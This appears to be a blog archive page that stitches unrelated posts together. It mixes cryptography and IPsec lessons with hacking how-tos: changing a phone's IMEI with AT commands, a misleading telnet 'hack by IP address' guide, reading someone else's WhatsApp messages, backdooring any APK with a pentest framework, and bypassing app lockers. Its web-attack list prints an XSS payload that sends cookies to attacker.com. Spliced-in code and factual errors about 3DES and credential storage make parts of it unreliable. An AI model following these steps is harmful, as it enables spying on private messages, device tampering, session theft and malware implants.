Monthly Archives: July 2016

MODULE 3.1 Applications of Cryptography

Cryptography can be applied in communication of data and information, which you will see in the form of IPsec, SSL, and PGP. In this section we will examine these protocol suites and see how cryptography fits in.

 

IPsec

Internet Protocol Security (IPsec) is a set of protocols designed to protect the confidentiality and integrity of data as it flows over a network. The set of protocols is designed to operate at the Network layer of the OSI model and process packets according to a predefined group of settings.

Some of the earliest mechanisms for ensuring security worked at the Application layer of the OSI model. IPsec is a new technology that has proven to be more successful than many of the previous methods.

IPsec has been widely adopted not only because of its tremendous security benefits but also because of its ability to be implemented without major changes to individual computer systems.

IPsec is especially useful for implementing virtual private networks and for remote user access through dial-up connection to private networks.

IPsec provides two mechanisms for protecting information: Authentication Header and Encapsulating Security Payload. The two mechanisms differ in what they provide:

  • Authentication Header (AH) provides authentication services, giving the receiver a way to authenticate the sender of data.
  • Encapsulating Security Payload (ESP) provides a means to authenticate information as well as encrypt the data.

 

 

Working with IPsec

In this exercise you will learn how to create a simple IPsec policy in the Windows operating system.

The following steps show you how to create an IPsec Negotiation policy on a Windows computer:

1. On Computer A, click Start ➢ All Programs ➢ Administrative Tools, and then select Local Security Policy.

2. Right-click IP Security Policies on the Local Computer node, and then choose Create IP Security Policy.

3. On the Welcome screen of the IP Security Policy Wizard, click Next.

4. In the Name field, type Secure21. In the Description field, type Policy to encrypt FTP, and then click Next.

5. On the Default Response Rule Authentication Method screen, choose the option Use This String To Protect The Key Exchange (Preshared Key) and type password.

6. On the Completing The IP Security Policy Wizard screen, ensure that Edit Properties is selected, and then click Finish.

7. In the Secure21 Properties dialog box, click Add.

8. On the Welcome To The Create IP Security Rule Wizard screen, click Next.

9. On the Tunnel EndPoint screen, click This Rule Does Not Specify A Tunnel. Click Next.

10. On the Network Type screen, click All Network Connections, and then click Next.

11. On the IP Filter List screen, click Add.

12. In the IP Filter List dialog box that appears, type Link1986, and then click Add.

13. On the Welcome screen of the IP Filter Wizard, click Next.

14. In the Description field, type 21 IPsec Filter. Click Next.

15. On the IP Traffic Source screen, click Any IP Address, and then click Next.

16. On the IP Traffic Destination screen, click Any IP Address, and then click Next.

17. On the IP Protocol Type screen, click TCP in the drop-down list, and then click Next.

18. On the Protocol Port screen, select From This Port, type 21 in the text box, select To Any Port, and then click Next.

19. On the Completing The IP Filter Wizard screen, click Finish, and then click OK.

20. In the IP Filter list, select Link1986, and then click Next.

21. In the Filter Action dialog box, click Add.

22. In the Filter Action Wizard dialog box, click Next.

23. In the Filter Action Name dialog box, type Secure21Filter, and then click Next.

24. In the Filter Action General Options dialog box, select Negotiate Security, and then click Next.

25. On the Communicating With Computers That Do Not Support IPsec screen, select Do Not Allow Unsecured Communications, and then click Next.

26. On the IP Traffic Security screen, select Integrity and Encryption, and then click Next.

27. On the Completing The IP Security Filter Action Wizard screen, click Finish.

28. In the Filter Action dialog box, select Secure21Filter, and then click Next.

29. In the Authentication Method dialog box, select Use This String To Protect The Key Exchange (Preshared Key), type password, and then click Next.

30. On the Completing The Security Rule Wizard screen, click Finish.

31. In the Secure21 Properties dialog box, click OK.

Once you’ve created the policy, you must activate it, so let’s do that.

 

On Computer A:

1. Click Start ➢ All Programs ➢ Administrative Tools ➢ Local Security Policy.

2. Select the Local Computer node ➢ IP Security Policies, and in the right pane right-click the Secure21 policy and click Assign.

On Computer B:

1. In the Local Security Policy Microsoft Management Console (MMC), on the Local Computer node right-click IP Security Policies, select All Tasks, and then click Export Policies.

2. In the Save As dialog box, type C:\IPsecPolicy\IPsecurityPolicy21.ipsec, and then click Save. You must then save the IPsec policy.

Import the security policy to a Windows machine.

Next, configure a Security Association rule in the Windows Firewall with Advanced Security MMC:

1. On Computer A, click Start ➢ Administrative Tools ➢ Windows Firewall With Advanced Security.

2. Select and then right-click Connection Security Rules, and then click New Rule.

3. In the New Connection Security Rule Wizard, select Server-To-Server, and then click Next.

4. On the Endpoints screen, select Any IP Address for both options, and then click Next.

5. On the Requirements screen, select Require Authentication For Inbound And Outbound Connections, and then click Next.

6. On the Authentication Method screen, select Preshared Key, type password in the text box, and then click Next.

7. On the Profile screen, verify that the Domain, Private, and Public options are selected, and then click Next.

8. In the Name text box, type Secure Server Authentication Rule, and then click Finish.

9. Perform steps 1–8 on Computer B.

MODULE 3.0 Cryptography

Cryptography is the body of knowledge that relates to the protection of information in all its forms.

Through the application of cryptography, you can safeguard the confidentiality and maintain the integrity as well as the nonrepudiation and authentication of information.

Cryptography provides you with a means of keeping information away from prying eyes and gives you a way to keep the same information intact from alteration.

This chapter focuses on cryptography and its application in the modern world, but first it delves into some of the rich history of the science to give you a firm foundation on which you can build your knowledge.

The science of cryptography provides a unique set of abilities that have been around as long as humans have wanted to share information with some but not with others.

Although technology, science, and computers have improved on the older methods, what has remained a constant is the underlying goal of protecting information.

 

Cryptography in Action

You will encounter cryptography in many forms throughout this book.

It is applied to many different technologies and situations and, as such, is something you need to have a firm grasp of.

Here are some examples of applied cryptography:

Public key infrastructure (PKI)

Digital certificates

Authentication

E-commerce

RSA

MD-5

Secure Hash Algorithm (SHA)

Secure Sockets Layer (SSL)

Pretty Good Privacy (PGP)

Secure Shell (SSH)

So How Does It Work?

Cryptography has many different ways of functioning. Before you can understand the basic process, you must become familiar with some terminology. With this in mind, let’s look at a few of the main terms used in the field of cryptography:

Plain Text/Clear Text: Plain text is the original message. It has not been altered; it is the usable information. Remember that even though Caesar’s cipher operates on text, it is but one form of plain text. Plain text can literally be anything.

Cipher Text: Cipher text is the opposite of plain text; it is a message or other data that has been transformed into a different format using a mechanism known as an algorithm. It is also something that can be reversed using an algorithm and a key.

Algorithms: Ciphers, the algorithms for transforming clear text into cipher text, are the trickiest and most mysterious part of the encryption process. This component sounds complex, but the algorithm or cipher is nothing more than a formula that includes discrete steps that describe how the encryption and decryption process is to be performed in a given instance.

Keys: Keys are an important, and frequently complicated, item. A key is a discrete piece of information, usually random in nature, that determines the result or output of a given cryptographic operation. A key in the cryptographic sense can be thought of in the same way a key in the physical world is: as a special item used to open or unlock something—in this case, a piece of information. In the encryption world, a key is used to produce a meaningful result and without it a result would not be possible.
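The four terms above, shown on a byte-wise Caesar shift as an added example (it is not from the original text); the sample message, the key value 77 and the function names are constructed for illustration. It also tries every possible key, which shows why a cipher with so small a key space protects nothing.

```python
from typing import List, Tuple


def encrypt(plain: bytes, key: int) -> bytes:
    """Algorithm: add the key to every byte, modulo 256.

    Working on bytes rather than letters reflects the point that plain
    text can be any data, not only text.
    """
    return bytes((b + key) % 256 for b in plain)


def decrypt(cipher: bytes, key: int) -> bytes:
    """Reverse the algorithm with the same key (symmetric)."""
    return bytes((b - key) % 256 for b in cipher)


def brute_force(cipher: bytes, crib: bytes) -> List[Tuple[int, bytes]]:
    """Try all 256 keys and keep candidates that contain a known word.

    The algorithm is assumed to be public; only the key is secret.
    With 256 possible keys the search is instantaneous.
    """
    hits = []
    for key in range(256):
        candidate = decrypt(cipher, key)
        if crib in candidate:
            hits.append((key, candidate))
    return hits


# Constructed sample values for the demonstration.
PLAIN = b"Transfer 1500 to account 4673"   # plain text
KEY = 77                                   # key
CIPHER = encrypt(PLAIN, KEY)               # cipher text

if __name__ == "__main__":
    print("cipher text:", CIPHER.hex())
    print("wrong key  :", decrypt(CIPHER, 78))
    print("right key  :", decrypt(CIPHER, KEY))
    print("recovered  :", brute_force(CIPHER, b"account"))
```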

 

Symmetric Cryptography

Symmetric algorithms do some things really well and other things not so well. Modern symmetric algorithms are great at all of the following:

  • Preserving confidentiality
  • Increased speed over many non-symmetric systems
  • Ensuring simplicity (relatively speaking, of course)
  • Providing authenticity

Symmetric algorithms have drawbacks in these areas:

  • Key management issues
  • Lack of nonrepudiation features

Common Symmetric Algorithms

There are currently a myriad of symmetric algorithms available to you; a Google search turns up an endless sea of alphabet soup of algorithms.

Let’s look at some common algorithms in the symmetric category:

Data Encryption Standard (DES): Originally adopted by the U.S. Government in 1977, the DES algorithm is still in use today. DES is a 56-bit key algorithm, but the key is too short to be used today for any serious security applications. DES is still encountered in many applications but should never be chosen without very careful consideration or the lack of other viable options.

Triple DES (3DES): This algorithm is an extension of the DES algorithm and is three times more powerful than the DES algorithm. The algorithm uses a 168-bit key. Triple DES, or 3DES, is very commonly used and is a component of many security solutions including e-commerce and others.

Blowfish: Blowfish is an algorithm that was designed to be strong, fast, and simple in its design. The algorithm uses a 448-bit key and is optimized for use in today’s 32- and 64-bit processors (which its predecessor DES was not). The algorithm was designed by encryption expert Bruce Schneier.

International Data Encryption Algorithm (IDEA): Designed in Switzerland and made available in 1990, this algorithm is seen in applications such as the Pretty Good Privacy (PGP) system.

RC2: Originally an algorithm that was a trade secret of RSA Labs, the RC2 algorithm crept into the public space in 1996. The algorithm allows keys between 1 and 2,048 bits. The RC2 key length was traditionally limited to 40 bits in software that was exported to allow for decryption by the U.S. National Security Agency.

RC4: Another algorithm that was originally a trade secret of RSA Labs, RC4, was revealed to the public via a newsgroup posting in 1994. The algorithm allows keys between 1 and 2,048 bits. RC4 is notable for its inclusion in the Wired Equivalent Protection (WEP) protocol used in early wireless networks.

RC5: Similar to RC2 and RC4, RC5 allows users to define a key length.

RC6: RC6 is another AES finalist developed by RSA Labs and supports key lengths of 128–256 bits.

Rijndael or Advanced Encryption Standard (AES): This successor to DES was chosen by the National Institute of Standards and Technology (NIST) to be the new U.S. encryption standard. The algorithm is very compact and fast and can use keys that are 128, 192, or 256 bits long. Rijndael was and is the name of the encryption algorithm submitted for consideration by the U.S. Government as its new encryption standard. When the algorithm was selected, it was renamed AES. While some may argue that Rijndael and AES are different, they are for all intents and purposes the same.

Twofish: This AES candidate, also developed by Bruce Schneier, supports key lengths of 128–256 bits.

 

How To Change IMEI, Device ID of Any Android Device

Changing the IMEI (International Mobile Equipment Identity) and device ID of an Android device is really not a good idea, because it has both advantages and disadvantages, but sometimes it helps us get some extra benefit from our device. While the IMEI is used to trace the location of a device or find a stolen device, changing the IMEI number, serial number, device ID, Donkeyguard number or UDID is also used to make a device untraceable.

You can also convert/change your Android IMEI to Blackberry (BB) IMEI by which you can use GLO BIS on it.

Reason to change/convert your device’s IMEI number,

1. Make you device untraceable and unreachable,
2. Convert Android IMEI to Blackberry IMEI to use GLO BIS plan,
3. Fix invalid IMEI  number problem on any devices,
4. Reset/Update/Repair your Device,
5. Getting an Unique device ID.

Universal method or the full procedure to change/rewrite IMEI number of an Android device(includes tablet) with or without root your device or with or without the use of any IMEI Changer Software, IMEI Change Tool, Terminal Emulator programmatically .

Find IMEI number or Device Id of any android device (either phone or tablet):

If you are unable to find out the device id or IMEI number of your device then a simple below trick will help you,
  • To find out IMEI number of your device, just dial *#06# .
  • To find out device ID, Just dial *#*#8255#*#* and you will get your device id in GTalk Service Monitor. And an another way to find out device id is by going to Menu > Settings > About Phone > Status.

How to change IMEI number

1. First Dial *#7465625# or *#*#3646633#*#* on your android device.

2. Now, click on Connectivity option or call pad,

3. Now look for CDS information and then click on it.

4. Then, checkout for Radio information.

5. Now, if your android device is a dual sim device. Then you will get two option like IMEI_1  [SIM1] and IMEI_2 [SIM2]. Then select any one or of which you want to change IMEI number.

6. Now, change your IMEI number illustrated below,

AT +EGMR=1,7,”IMEI_1” and “AT +EGMR=1,10,”IMEI_2

7. Now, just replace IMEI1 or IMEI2 with your any your desired number. and then click on SEND.

Note: You can also change IMEI number to any Blackberry [BB] IMEI number.

How to Change Device ID of your Android phone or tablet:

Device ID of an Android device can be changed with or without root,

Change Device ID with Root,

1. First Root Your Android device.

2. Now, Download and install Device ID changer,

3. Now, follow the wizard of this app.

4. And after changing the device id, restart/reboot your device and done.

Change Device ID without Root,

 

1. First, back up your Android device.

2. Go to Settings. and then click on Backup & Reset.

3. Then, click on ‘Factory Data Reset‘.

4. And, then reset you phone.

5. When, reset done. Then you will get a new and unique device ID.

Note: This will wipe all your data, like messages, phone memory, contacts and apps. So you must back up your device first, and after that you can restore it.

Hack a Computer Only with just a IP Address in Easy steps

Steps to Hack IP Address:


1) Prepare the IP address of the Victim. (e.g : 101.23.53.70 )

2) Download and Install Advanced Port Scanner.

3) Open Advanced Port Scanner and Type the IP Address in the right column and Click Scan.

4) It will lists you all Opened Ports of the Victim’s PC or Router. (e.g : Port 91 )
5) After retrieving the IP address and the Opened Ports of the Victim, Open Command Prompt (CMD)
and Type: telnet [IP ADDRESS] [PORT]
 
e.g : telnet 101.23.53.70  91
 

6) Now you’ll be asked to Enter Login Information, Just type Username and Password and hit Enter.
If no password is used just type the Username.

Done! Now you’ll get access to all Victim’s Files and Documents by browsing with CMD (use cd, copy, delete, mv… to do all tricks.)

10 Most Popular Ways Hackers Hack Your Website

Hackers can attack in so many ways, but here are the ten most popular ways they can threaten the security of your site, and your business:

10.  Injection Attacks

An injection attack occurs when there are flaws in your SQL database, SQL libraries, or even the operating system itself. Employees open seemingly credible files with hidden commands, or “injections”, unknowingly.

In doing so, they’ve allowed hackers to gain unauthorized access to private data such as social security numbers, credit card number or other financial data.

Technical Injection Attack Example:

An Injection Attack could have this command line:

String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";

The hacker modifies the ‘id’ parameter in their browser to send: ' or '1'='1. This changes the meaning of the query to return all the records from the accounts database to the hacker, instead of only the intended customers.
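The concatenated query above next to its parameterized form, run against an in-memory SQLite table, as an added example that is not part of the original article. The table contents and function names are constructed, and Python's sqlite3 module stands in for the Java servlet.

```python
import re
import sqlite3

# Constructed sample rows standing in for the article's "accounts" table.
ROWS = [("1001", "alice", 2500), ("1002", "bob", 40), ("1003", "carol", 910)]

# The modified 'id' parameter quoted in the article.
PAYLOAD = "' or '1'='1"

# Assumed id format for this demo: 1 to 10 digits.
CUST_ID_FORMAT = re.compile(r"[0-9]{1,10}")


def make_db() -> sqlite3.Connection:
    """Build the demo table in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts (custID TEXT, owner TEXT, balance INTEGER)"
    )
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", ROWS)
    return conn


def lookup_concatenated(conn: sqlite3.Connection, cust_id: str) -> list:
    """Vulnerable: builds the SQL text the same way the article's query does,
    so quote characters in cust_id become part of the statement."""
    query = "SELECT * FROM accounts WHERE custID='" + cust_id + "'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, cust_id: str) -> list:
    """Hardened: the value is bound as data and is never parsed as SQL."""
    return conn.execute(
        "SELECT * FROM accounts WHERE custID=?", (cust_id,)
    ).fetchall()


def lookup_validated(conn: sqlite3.Connection, cust_id: str) -> list:
    """Defence in depth: reject ids that do not match the expected format
    before the (still parameterized) query runs."""
    if not CUST_ID_FORMAT.fullmatch(cust_id):
        raise ValueError("custID must be 1-10 digits")
    return lookup_parameterized(conn, cust_id)


if __name__ == "__main__":
    db = make_db()
    print("concatenated :", lookup_concatenated(db, PAYLOAD))   # every row
    print("parameterized:", lookup_parameterized(db, PAYLOAD))  # no rows
    print("normal lookup:", lookup_parameterized(db, "1002"))
```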

9.  Cross Site Scripting Attacks

Cross Site Scripting, also known as an XSS attack, occurs when an application, URL “get request”, or file packet is sent to the web browser window, bypassing the validation process. Once an XSS script is triggered, its deceptive property makes users believe that the compromised page of a specific website is legitimate.

For example, if www.example.com/abcd.html has XSS script in it, the user might see a popup window asking for their credit card info and other sensitive info.

Technical Cross Site Scripting Example:

A more technical example:

(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

The attacker modifies the ‘CC’ parameter in their browser to:

'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'

This causes the user’s session ID to be sent to the attacker’s website, allowing the hacker to hijack the user’s current session.  That means the hacker has access to the website admin credentials and can take complete control over it.  In other words, hack it.
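The page fragment above with and without output encoding, checked by parsing the result the way a browser would, as an added example that is not part of the original article. The function names and the SESSIONID cookie name are constructed; the HttpOnly flag at the end keeps the session cookie out of reach of document.cookie.

```python
import html
from html.parser import HTMLParser
from http.cookies import SimpleCookie

# The modified 'CC' parameter quoted in the article.
PAYLOAD = (
    "'><script>document.location="
    "'http://www.attacker.com/cgi-bin/cookie.cgi?foo='"
    "+document.cookie</script>'"
)


def render_concatenated(cc: str) -> str:
    """Vulnerable: the parameter is pasted into the markup unchanged."""
    return "<input name='creditcard' type='TEXT' value='" + cc + "'>"


def render_encoded(cc: str) -> str:
    """Hardened: HTML-encode the value, including both quote characters,
    so it cannot close the attribute or open a new tag."""
    return (
        "<input name='creditcard' type='TEXT' value='"
        + html.escape(cc, quote=True)
        + "'>"
    )


class TagCollector(HTMLParser):
    """Records which start tags a parser sees and any value attributes."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []
        self.values = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.values.extend(v for k, v in attrs if k == "value")


def parse(markup: str):
    """Return (start tags, value attributes) found in the markup."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags, collector.values


def session_cookie(session_id: str) -> str:
    """Session cookie that page scripts cannot read (HttpOnly) and that is
    only sent over TLS (Secure). SESSIONID is a constructed name."""
    jar = SimpleCookie()
    jar["SESSIONID"] = session_id
    jar["SESSIONID"]["httponly"] = True
    jar["SESSIONID"]["secure"] = True
    jar["SESSIONID"]["path"] = "/"
    return jar["SESSIONID"].OutputString()


if __name__ == "__main__":
    print("concatenated ->", parse(render_concatenated(PAYLOAD))[0])
    print("encoded      ->", parse(render_encoded(PAYLOAD))[0])
    print("Set-Cookie:", session_cookie("abc123"))
```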

8. Broken Authentication and Session Management Attacks

If the user authentication system of your website is weak, hackers can take full advantage.

Authentication systems involve passwords, key management, session IDs, and cookies that can allow a hacker to access your account from any computer (as long as they are valid).

If a hacker exploits the authentication and session management system, they can assume the user’s identity.

Scary indeed.

Ask yourself these questions to find out if your website is vulnerable to a broken authentication and session management attack:

  • Are user credentials weak (e.g. stored using hashing or encryption)?
  • Can credentials be guessed or overwritten through weak account management functions (e.g. account creation, change password, recover password, weak session IDs)?
  • Are session IDs exposed in the URL (e.g. URL rewriting)?
  • Are session IDs vulnerable to session fixation attacks?
  • Do session IDs timeout and can users log out?

If you answered “yes” to any of these questions, your site could be vulnerable to a hacker.

7. Clickjacking Attacks

Clickjacking, also called a UI Redress Attack, is when a hacker uses multiple opaque layers to trick a user into clicking the top layer without them knowing.

Thus the attacker is “hijacking” clicks that are not meant for the actual page, but for a page where the attacker wants you to be.

For example, using a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password for their bank account, but are actually typing into an invisible frame controlled by the attacker.

Clickjacking example:

Here’s a live, but safe example of how clickjacking works:

http://attacker.kotowicz.net/alphabet-hero/game.html

 

6. DNS Cache Poisoning

DNS Cache Poisoning involves old cache data that you might think you no longer have on your computer, but is actually “toxic”.

Also known as DNS Spoofing, hackers can identify vulnerabilities in a domain name system, which allows them to divert traffic from legit servers to a fake website and/or server.

This form of attack can spread and replicate itself from one DNS server to another, “poisoning” everything in its path.

In fact, in 2010, a DNS poisoning attack completely compromised the Great Firewall of China (GFC) temporarily and censored certain content in the United States until the problem was fixed.

5. Social Engineering Attacks

A social engineering attack is not technically a “hack”.

It happens when you divulge private information in good faith, such as a credit card number, through common online interactions such as email, chat, social media sites, or virtually any website.

The problem, of course, is that you’re not getting into what you think you’re getting into.

A classic example of a social engineering attack is the “Microsoft tech support” scam.

This is when someone from a call center pretends to be a MS tech support member who says that your computer is slow and/or infected, and can be easily fixed – at a cost, of course.

Here’s an article from Wired.com on how a security expert played along with a so-called Microsoft tech support person.

4. Symlinking – An Insider Attack

A symlink is basically a special file that “points to” a hard link on a mounted file system. A symlinking attack occurs when a hacker positions the symlink in such a way that the user or application that accesses the endpoint thinks they’re accessing the right file when they’re really not.

If the endpoint file is an output, the consequence of the symlink attack is that it could be modified instead of the file at the intended location. Modifications to the endpoint file could include appending, overwriting, corrupting, or even changing permissions.

In different variations of a symlinking attack a hacker may be able to control the changes to a file, grant themselves advanced access, insert false information, expose sensitive information or corrupt or destroy vital system or application files.
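The output-file case described above, with a writer that follows symlinks next to one that refuses them, as an added example that is not part of the original article. The file names and function names are constructed, and the demo runs entirely inside a temporary directory on a POSIX system.

```python
import errno
import os
import tempfile


def write_following_links(path: str, data: str) -> None:
    """Vulnerable pattern: open() follows a symlink at `path`, so the data
    lands in whatever file the link points to."""
    with open(path, "w") as handle:
        handle.write(data)


def write_refusing_links(path: str, data: str) -> None:
    """Hardened pattern: O_NOFOLLOW makes the open fail if the final path
    component is a symlink. It does not protect earlier components of the
    path, so the parent directory must not be writable by untrusted users."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | os.O_NOFOLLOW
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as handle:
        handle.write(data)


def demo():
    """Return (refused, target after hardened write, target after
    link-following write)."""
    with tempfile.TemporaryDirectory() as workdir:
        target = os.path.join(workdir, "important.conf")  # file to protect
        link = os.path.join(workdir, "app.log")           # expected output
        with open(target, "w") as handle:
            handle.write("original\n")
        # Constructed scenario: the output path has been replaced by a
        # symlink that points at the protected file.
        os.symlink(target, link)

        refused = False
        try:
            write_refusing_links(link, "log line\n")
        except OSError as exc:
            # Linux and macOS report ELOOP; some BSDs report EMLINK.
            refused = exc.errno in (errno.ELOOP, errno.EMLINK)
        with open(target) as handle:
            after_hardened = handle.read()

        write_following_links(link, "log line\n")
        with open(target) as handle:
            after_following = handle.read()

        return refused, after_hardened, after_following


if __name__ == "__main__":
    print(demo())
```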

3. Cross Site Request Forgery Attacks

A Cross Site Request Forgery Attack happens when a user is logged into a session (or account) and a hacker uses this opportunity to send them a forged HTTP request to collect their cookie information.

In most cases, the cookie remains valid as long as the user or the attacker stays logged into the account.  This is why websites ask you to log out of your account when you’re finished – it will expire the session immediately.

In other cases, once the user’s browser session is compromised, the hacker can generate requests to the application that will not be able to differentiate between a valid user and a hacker.

A Cross Site Request Forgery Example

Here’s an example:

http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243

<img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />

In this case the hacker creates a request that will transfer money from a user’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control.
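A server-side check that rejects the forged transfer request above, as an added example that is not part of the original article. It assumes a per-session anti-CSRF token derived with HMAC and a handler that only accepts POST for state changes; the handler, session ids and key are constructed.

```python
import hashlib
import hmac
import secrets

# Per-deployment secret, generated here for the demo (constructed).
SERVER_KEY = secrets.token_bytes(32)


def csrf_token_for(session_id: str) -> str:
    """Token bound to one session. A page on another origin cannot read it,
    so it cannot be included in a forged request."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def handle_transfer(method: str, session_id: str, params: dict):
    """Return (status, message) for a transferFunds request.

    The session cookie is sent by the browser automatically, which is why
    it proves nothing about who built the request. The token has to be
    supplied by the page itself.
    """
    if method != "POST":
        # An <img> or iframe src can only issue GET requests.
        return 405, "state-changing action requires POST"
    supplied = params.get("csrf_token", "")
    expected = csrf_token_for(session_id)
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403, "missing or invalid CSRF token"
    return 200, "transfer of %s to %s accepted" % (
        params["amount"], params["destinationAccount"])


# Constructed requests. The victim's browser attaches session "sess-victim".
FORGED_IMG = ("GET", "sess-victim",
              {"amount": "1500", "destinationAccount": "attackersAcct"})
FORGED_FORM = ("POST", "sess-victim",
               {"amount": "1500", "destinationAccount": "attackersAcct"})
STOLEN_TOKEN = ("POST", "sess-victim",
                {"amount": "1500", "destinationAccount": "attackersAcct",
                 "csrf_token": csrf_token_for("sess-attacker")})
LEGITIMATE = ("POST", "sess-victim",
              {"amount": "1500", "destinationAccount": "4673243243",
               "csrf_token": csrf_token_for("sess-victim")})

if __name__ == "__main__":
    for name, request in [("forged img", FORGED_IMG),
                          ("forged form", FORGED_FORM),
                          ("other session's token", STOLEN_TOKEN),
                          ("legitimate", LEGITIMATE)]:
        print(name, "->", handle_transfer(*request))
```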

2. Remote Code Execution Attacks

A Remote Code Execution attack is a result of either server side or client side security weaknesses.

Vulnerable components may include libraries, remote directories on a server that haven’t been monitored, frameworks, and other software modules that run on the basis of authenticated user access. Applications that use these components are always under attack through things like scripts, malware, and small command lines that extract information.

The following vulnerable components were downloaded 22 million times in 2011:

Apache CXF Authentication Bypass (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451)

By failing to provide an identity token, attackers could invoke any web service with full permission.

1. DDoS Attack – Distributed Denial Of Service Attack

DDoS, or Distributed Denial of Service, is where a server or a machine’s services are made unavailable to its users.

And when the system is offline, the hacker proceeds to either compromise the entire website or a specific function of a website to their own advantage.

It’s kind of like having your car stolen when you really need to get somewhere fast.

The usual agenda of a DDoS campaign is to temporarily interrupt or completely take down a successfully running system.

The most common example of a DDoS attack could be sending tons of URL requests to a website or a webpage in a very small amount of time.  This causes bottlenecking at the server side because the CPU just ran out of resources.

Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers.

How To Hack Whatsapp Conversation 2016

WhatsApp is one of the most widely used instant messaging applications in recent years. Attractive features like cross-platform support and media sharing have made WhatsApp the top choice among most users. On the other hand, WhatsApp has also become a favorite application for many cheaters to exchange secret messages and maintain illicit relationships.

Everybody uses WhatsApp messenger on Android phones. So here I tell you how you can hack a WhatsApp conversation and read the WhatsApp content of other users. Extracting WhatsApp data is not so easy because WhatsApp encrypts all backup data in .crypt format. All WhatsApp messages are stored in encrypted format. So here I tell you everything about extracting WhatsApp data.

Steps To Hack Whatsapp Conversation

1. First, back up your WhatsApp messages

  • Open WhatsApp from your App drawer
  • Press on the 3-dot menu icon on the top right
  • Tap on Settings, this will open the WhatsApp settings
  • Tap on Chat settings
  • Now, tap on Backup conversations to backup all the present messages

2. After the backup, download the Android app named Tri Crypt. This app decrypts the WhatsApp crypt 5 format to a readable .db (database) format.

3. Open the Tri Crypt Android app.

4. Click on decrypt whatsapp messages.

5. Now download the Sqlite Editor Android app for reading the WhatsApp .db file.

6. Open the Sqlite Editor Android app and go to Files. Here we have files and directories. We find the msgstore.db file in these directories.

7. Now follow this path in Files: sd card folder > whatsapp > Databases, and open the msgstore.db file.

8. Now read all the WhatsApp messages on the Android phone.

How To Use WhatsApp Without Mobile Number 2015 and 2016

Hi guys, today I am going to share with you a latest WhatsApp hacking trick: how to use WhatsApp without using your mobile number. Some people ask me about this and they all think it's not possible, but today Pro Hackers gives you a trick to use all these hacks for free.
First of all, save your complete WhatsApp data to your phone.
  • You don't have any need to remove it completely.
  • Go to Settings, then go to WhatsApp and Clear Data. After clearing the data, all your WhatsApp data is removed and your WhatsApp is completely new.
  • Now go to receivefreesms.com and select any of the no. Here I will use an Indian Mobile Number.
  • Enter the number in the required field on Whatsapp. It will take you to the sms verification page.

Now go back to receivefreesms.com and click on the number which you have chosen to verify Whatsapp sms verification.

  • Enter the verification code in WhatsApp verification page. That’s it, you are done..

Note:-  Some numbers might not work due to the technical error, no problem choose any other number to verify sms verification. The only drawback with this trick is anyone can use the same no. for verification so during those times WhatsApp will ask you to re-verify your number.

fping 3 – Multi Target ICMP Ping Tool

fping is a program like ping which uses the Internet Control Message Protocol (ICMP) echo request to determine if a target host is responding. fping differs from ping in that you can specify any number of targets on the command line, or specify a file containing the lists of targets to ping. Instead of sending […]


Read the full post at darknet.org.uk



Backdooring any APK using OpenSource PENETRATION TESTING tools

Smartphone Pentest Framework ships with Kali Linux and is quite well known for its utility in the penetration testing of Android devices. It includes a huge range of attack tools for penetration testing of Android devices. One of the features is to take a compiled APK file and add backdoor code to it. This tutorial is about how you can take custom compiled APK files and add the SPF backdoor to them.

The resulting app looks and feels like the original app, but with some extra functionality. This is just what a penetration tester would want.

Building SPF Agents: Backdooring Any APK


Let's say you are doing a Mobile Security Audit for an organisation. If you don't want to use the plain APK generated by SPF, then SPF allows you to take a precompiled APK and add custom backdoor code to it. This is also known as refactoring the APK in penetration testing terms. This, however, requires you to use the third-party apktool.

For backdooring any APK, choose option 1 from the main menu followed by 5.) Backdoor APK with Agent. You will be prompted for the APK to backdoor. If apktool is not found, SPF will ask you if you want to download it before continuing.

spf> 1
Select An Option from the Menu:
1.) Attach Framework to a Deployed Agent
2.) Generate Agent App
3.) Copy Agent to Web Server
4.) Import an Agent Template
5.) Backdoor Android APK with Agent
6.) Create APK Signing Key
spf> 5
APKTool not found! Is it installed? Check your config file
Install Android APKTool(y/N)?
spf> y
..snip..
Puts the Android Agent inside an Android App APK. The application runs normally with extra functionality
APK to Backdoor: /root/Desktop/MapsDemo.apk
I: Baksmaling...

 

You will be prompted for the same information for control as backdooring source code.

Phone number of the control modem for the agent: 15555215554
Control key for the agent: KEYKEY1
Webserver control path for agent: /androidagent1
Control Number: 15555215554
Control Key:KEYKEY1
ControlPath:/androidagent1
Is this correct?(y/n) y
..snip..

 

The APK will be rebuilt with the SPF Agent included.

Clean and simple as that. This is as quick as it can get.

Are Android App Lockers really Secure ?

Android has been a common target for the exploit community. This post describes how a few simple steps can be taken to bypass an App Locker.

App Lockers are used by most of us to protect our Androids from unwanted or unauthorized access to our personal information. If you do a quick search for the phrase “app lock” in the Google Play Store, you will find lots of applications that provide a facility to protect individual and multiple applications. But with a few steps anyone can bypass the same:

Here are the steps:

Step 1. Install any App locker from the Play Store.

Step 2. Provide a password to the App locker.

Now the applications protected with the app locker require the password of the app locker. Now perform the following steps to bypass the app locker password.

Step 3. Now go to Settings.

Step 4. Then Application.

Step 5. Select your App Locker.

Step 6. Now click on the Clear data button.

Step 7. Now click on the Force stop button.

Step 8. Finish.

Now open any application which is protected with the app locker, without credentials.

